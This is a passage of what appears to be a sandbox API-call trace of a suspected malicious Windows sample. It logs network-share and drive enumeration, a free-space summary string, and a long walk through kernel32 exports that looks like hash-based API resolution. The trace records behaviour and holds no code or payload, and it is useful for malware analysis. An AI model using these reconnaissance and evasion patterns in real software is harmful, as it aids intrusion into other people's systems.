flAllocationType=0x3000, flProtect=0x4) returned 0x360000 [0035.606] WNetEnumResourceW (in: hEnum=0x5ebed0, lpcCount=0xc9e880, lpBuffer=0x360000, lpBufferSize=0xc9e878 | out: lpcCount=0xc9e880, lpBuffer=0x360000, lpBufferSize=0xc9e878) returned 0x103 [0035.607] WNetCloseEnum (hEnum=0x5ebed0) returned 0x0 [0035.607] WNetEnumResourceW (in: hEnum=0x5f8758, lpcCount=0xc9e8b0, lpBuffer=0x350000, lpBufferSize=0xc9e8a8 | out: lpcCount=0xc9e8b0, lpBuffer=0x350000, lpBufferSize=0xc9e8a8) returned 0x0 [0035.607] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x13, lpNetResource=0x350000, lphEnum=0xc9e87c | out: lphEnum=0xc9e87c*=0xffffffff) returned 0x4b8 [0047.980] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0047.983] WNetEnumResourceW (in: hEnum=0x5f8758, lpcCount=0xc9e8b0, lpBuffer=0x350000, lpBufferSize=0xc9e8a8 | out: lpcCount=0xc9e8b0, lpBuffer=0x350000, lpBufferSize=0xc9e8a8) returned 0x0 [0047.984] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x13, lpNetResource=0x350000, lphEnum=0xc9e87c | out: lphEnum=0xc9e87c*=0xffffffff) returned 0x4c6 [0047.988] WNetEnumResourceW (in: hEnum=0x5f8758, lpcCount=0xc9e8b0, lpBuffer=0x350000, lpBufferSize=0xc9e8a8 | out: lpcCount=0xc9e8b0, lpBuffer=0x350000, lpBufferSize=0xc9e8a8) returned 0x103 [0047.988] WNetCloseEnum (hEnum=0x5f8758) returned 0x0 [0047.991] GetLogicalDriveStringsW (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x5 [0047.994] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x350000 [0047.994] GetLogicalDriveStringsW (in: nBufferLength=0x5, lpBuffer=0x350000 | out: lpBuffer="C:\\") returned 0x4 [0047.998] lstrcpyW (in: lpString1=0x350000, lpString2="|" | out: lpString1="|") returned="|" [0047.998] GetLogicalDriveStringsW (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x5 [0047.998] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x360000 [0047.998] GetLogicalDriveStringsW (in: nBufferLength=0x5, lpBuffer=0x360000 | out: lpBuffer="C:\\") returned 0x4 [0047.998] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0047.999] GetDiskFreeSpaceW (in: lpRootPathName="C:\\", lpSectorsPerCluster=0xc9e898, lpBytesPerSector=0xc9e894, lpNumberOfFreeClusters=0xc9e890, lpTotalNumberOfClusters=0xc9e88c | out: lpSectorsPerCluster=0xc9e898, lpBytesPerSector=0xc9e894, lpNumberOfFreeClusters=0xc9e890, lpTotalNumberOfClusters=0xc9e88c) returned 1 [0047.999] wsprintfW (in: param_1=0x350002, param_2="%c_%c_%d/%d|" | out: param_1="C_F_497106/523979|") returned 18 [0047.999] VirtualFree (lpAddress=0x360000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0047.999] lstrlenA (lpString="kernel32.dll") returned 12 [0048.000] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0048.000] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0048.000] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0048.000] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0048.000] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0048.000] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0048.000] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0048.000] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0048.000] lstrlenA (lpString="ADDATOMA") returned 8 [0048.000] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0048.000] lstrlenA (lpString="ADDATOMW") returned 8 [0048.000] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0048.000] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0048.000] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0048.000] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0048.000] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0048.000] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0048.000] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0048.000] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0048.000] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0048.000] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0048.000] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0048.000] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0048.000] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0048.000] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0048.000] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0048.000] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0048.000] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0048.000] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0048.000] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0048.000] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0048.001] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0048.001] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0048.001] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0048.001] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0048.001] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0048.001] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0048.001] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0048.001] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0048.001] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0048.001] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0048.001] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0048.001] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0048.001] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0048.001] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0048.001] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0048.001] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0048.001] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0048.001] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0048.001] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0048.001] lstrlenA (lpString="BACKUPREAD") returned 10 [0048.001] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0048.001] lstrlenA (lpString="BACKUPSEEK") returned 10 [0048.001] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0048.001] lstrlenA (lpString="BACKUPWRITE") returned 11 [0048.001] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0048.001] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0048.001] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0048.001] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0048.001] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0048.001] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0048.001] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0048.001] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0048.001] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0048.002] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0048.002] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0048.002] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0048.002] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0048.002] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0048.002] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0048.002] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0048.002] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0048.002] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0048.002] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0048.002] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0048.002] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0048.002] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0048.002] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0048.002] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0048.002] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0048.002] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0048.002] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0048.002] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0048.002] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0048.002] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0048.002] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0048.002] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0048.002] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0048.002] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0048.002] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0048.002] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0048.002] lstrcpyA (in: lpString1=0xc9dc50, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0048.002] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0048.002] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0048.002] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0048.002] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0048.002] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0048.002] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0048.002] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0048.002] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0048.003] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0048.003] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0048.003] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0048.003] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0048.003] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0048.003] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0048.003] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0048.003] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0048.003] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0048.003] lstrcpyA (in: lpString1=0xc9dc50, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0048.003] lstrlenA (lpString="BEEP") returned 4 [0048.003] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0048.003] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0048.003] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0048.003] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0048.003] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0048.003] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0048.003] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0048.003] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0048.003] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0048.003] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0048.003] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0048.003] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0048.003] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0048.003] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0048.003] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0048.003] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0048.003] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0048.003] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0048.003] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0048.003] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0048.003] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0048.003] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0048.003] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0048.003] lstrlenA (lpString="CANCELIO") returned 8 [0048.003] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0048.003] lstrlenA (lpString="CANCELIOEX") returned 10 [0048.003] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0048.004] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0048.004] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0048.004] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0048.004] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0048.004] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0048.004] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0048.004] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0048.004] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0048.004] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0048.004] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0048.004] lstrlenA (lpString="CHECKELEVATION") returned 14 [0048.004] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0048.004] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0048.004] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0048.004] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0048.004] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0048.004] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0048.004] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0048.004] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0048.004] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0048.004] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0048.004] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0048.004] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0048.004] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0048.004] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0048.004] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0048.004] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0048.004] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0048.004] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0048.004] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0048.004] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0048.004] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0048.004] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0048.004] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0048.005] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0048.005] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0048.005] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0048.005] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0048.005] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0048.005] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0048.005] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0048.005] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0048.005] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0048.005] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0048.005] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0048.005] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0048.005] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0048.005] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0048.005] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0048.005] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0048.005] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0048.005] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0048.005] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0048.005] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0048.005] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0048.005] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0048.005] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0048.005] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0048.005] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0048.005] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0048.005] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0048.005] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0048.005] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0048.005] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0048.005] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0048.005] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0048.005] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0048.005] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0048.005] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0048.006] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0048.006] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0048.006] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0048.006] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0048.006] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0048.006] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0048.006] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0048.006] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0048.006] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0048.006] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0048.006] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ConvertSystemTimeToCalDateTime" | out: 